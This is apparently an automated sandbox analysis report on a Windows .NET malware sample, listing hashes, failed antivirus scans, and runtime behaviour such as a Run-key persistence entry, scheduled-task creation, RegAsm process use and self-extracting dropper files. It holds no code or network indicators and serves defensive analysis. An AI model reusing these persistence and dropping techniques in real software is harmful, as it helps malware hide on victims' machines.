Analysis Date: 2016-02-06 13:19:10
MD5: 44a1a8c29fcdd0dd3c01cdbd6441881b
SHA1: aa9d38eca69bd0f50582fa5e3c5da0afa4995d74

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
Section .text md5: 61405545b9d6a514b8bef37167e18367 sha1: 9b2b15f9aa288a968981cff2b805d9ca9d9749a4 size: 958464
Section .data md5: sha1: size:
Section .xcpad md5: sha1: size:
Section .idata md5: sha1: size:
Section .reloc md5: ba4f2c1dcc167d3c9393cbea468f46fa sha1: eb1baf173094fa52ae6b2a48d2c0efc6962e676a size: 4096
Section .rsrc md5: 927c04f685e8039af6d2f6cb9660b496 sha1: c25a1f8ea18c24de97ced325ed350b2d912dadda size: 4096
Timestamp:
Version LegalCopyright:
PackagerVersion:
InternalName:
FileVersion:
CompanyName:
Comments:
ProductName:
ProductVersion:
FileDescription:
Packager:
OriginalFilename:
Packer:
PEhash:
IMPhash: f34d5f2d4577ed6d9ceec516c1f5a744
AV Ad-Aware: Error Scanning File
AV Alwil (avast): Error Scanning File
AV Arcabit (arcavir): Error Scanning File
AV Authentium: Error Scanning File
AV Avira (antivir): Error Scanning File
AV BitDefender: Error Scanning File
AV BullGuard: Error Scanning File
AV CA (E-Trust Ino): Error Scanning File
AV CAT (quickheal): Error Scanning File
AV ClamAV: Error Scanning File
AV Dr. Web: Error Scanning File
AV Emsisoft: Error Scanning File
AV Eset (nod32): Error Scanning File
AV F-Secure: Error Scanning File
AV Fortinet: Error Scanning File
AV Frisk (f-prot): Error Scanning File
AV Grisoft (avg): Error Scanning File
AV Ikarus: Error Scanning File
AV K7: Error Scanning File
AV Kaspersky: Error Scanning File
AV MalwareBytes: Error Scanning File
AV Mcafee: Error Scanning File
AV MicroWorld (escan): Error Scanning File
AV Microsoft Security Essentials: Error Scanning File
AV Rising: Error Scanning File
AV Symantec: Error Scanning File
AV Trend Micro: Error Scanning File
AV Twister: Error Scanning File
AV VirusBlokAda (vba32): Error Scanning File
AV Zillya!: Error Scanning File

Runtime Details:

Process
↳ C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Creates Mutex
Creates Mutex
Creates Mutex: f2687dfa-76ea-4e42-bac6-798b678e233d
Creates Mutex: eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-21-3542270870-992954940-2626765878-1000
Creates Mutex
Creates Mutex: Global\.net clr networking
Creates Mutex: Global\.net clr networking
Creates File: C:\Windows\AppPatch\AcGenral.DLL
Creates File: C:\Windows\AppPatch\AcLayers.DLL
Creates File: C:\Windows\system32\l_intl.nls
Creates File: C:\Windows\assembly\pubpol4.dat
Creates File: C:\Users\Admin\AppData\Roaming\Imminent\Path.dat
Creates File: C:\Windows\system32\tzres.dll
Creates File: C:\Users\Admin\AppData\Roaming\Imminent\Logs\06-02-2016
Creates File: Nsi
Creates File: C:\Users\Admin\AppData\Roaming\Imminent\Logs\06-02-2016
Creates File: C:\Users\Admin\AppData\Roaming\Imminent\Logs\06-02-2016
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\macrons ➝ C:\Users\Admin\AppData\Roaming\macrons\macrons.exe\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\Version ➝ 7

Process
↳ C:\Windows\System32\schtasks.exe

Creates Mutex
Creates File: C:\Users\Admin\AppData\Local\Temp\1547424608.xml

Process
↳ C:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe

Creates Mutex
Creates Mutex
Creates Mutex
Creates Mutex: Local\ZonesCounterMutex
Creates Mutex: Local\ZoneAttributeCacheCounterMutex
Creates Mutex: Local\ZonesCacheCounterMutex
Creates Mutex: Local\ZoneAttributeCacheCounterMutex
Creates Mutex: Local\ZonesLockedCacheCounterMutex
Creates File: C:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe.config
Creates File: C:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe
Creates File: C:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe.config
Creates File: C:\Windows\system32\l_intl.nls
Creates File: C:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe
Creates File: C:\Windows\assembly\pubpol4.dat
Creates File: C:\Users\Admin\AppData\Local\Temp\1547424608.xml
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000009.db
Creates File: C:\Windows\System32\schtasks.exe
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝ 0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝ 0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝ 1

Process
↳ C:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe

Creates Mutex
Creates Mutex
Creates Mutex
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe.config
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe.config
Creates File: C:\Windows\system32\l_intl.nls
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe
Creates File: C:\Windows\assembly\pubpol4.dat
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0\JrVzWJrYnjUOghD.dat
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0\JrVzWJrYnjUOghD.dat

Process
↳ C:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe

Creates File: C:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000009.db
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe
Creates Mutex
Creates Mutex: Local\ZonesCounterMutex
Creates Mutex: Local\ZoneAttributeCacheCounterMutex
Creates Mutex: Local\ZonesCacheCounterMutex
Creates Mutex: Local\ZoneAttributeCacheCounterMutex
Creates Mutex: Local\ZonesLockedCacheCounterMutex
Creates Mutex
Creates Mutex: Local\ZonesCounterMutex
Creates Mutex: Local\ZoneAttributeCacheCounterMutex
Creates Mutex: Local\ZonesCacheCounterMutex
Creates Mutex: Local\ZoneAttributeCacheCounterMutex
Creates Mutex: Local\ZonesLockedCacheCounterMutex
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝ 0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝ 0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝ 0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝ 0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝ 1

Process
↳ C:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe

Creates Mutex
Creates Mutex
Creates Mutex: Local\ZonesCounterMutex
Creates Mutex: Local\ZoneAttributeCacheCounterMutex
Creates Mutex: Local\ZonesCacheCounterMutex
Creates Mutex: Local\ZoneAttributeCacheCounterMutex
Creates Mutex: Local\ZonesLockedCacheCounterMutex
Creates Mutex
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates File: __tmp_rar_sfx_access_check_8432097
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates File: gVBchpp.exe
Creates File: JrVzWJrYnjUOghD.dat
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000009.db
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe
Creates File: C:\Windows\AppPatch\pcamain.sdb
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe
Creates File: C:\Users\desktop.ini
Creates File: C:\
Creates File: \SystemRoot\AppPatch\sysmain.sdb
Creates File: C:\Windows\system32\ntshrui.dll
Creates File: C:\Windows\system32\ntshrui.dll
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0
Creates File: C:\Users\Admin\AppData\Local\Temp\RarSFX0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝ 0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝ 0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝ 1

Process
↳ C:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe

Creates File: C:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe.config
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe.config
Creates File: C:\Windows\system32\l_intl.nls
Creates File: C:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe
Creates File: C:\Windows\assembly\pubpol4.dat
Creates Mutex

Network Details:


Raw Pcap


Strings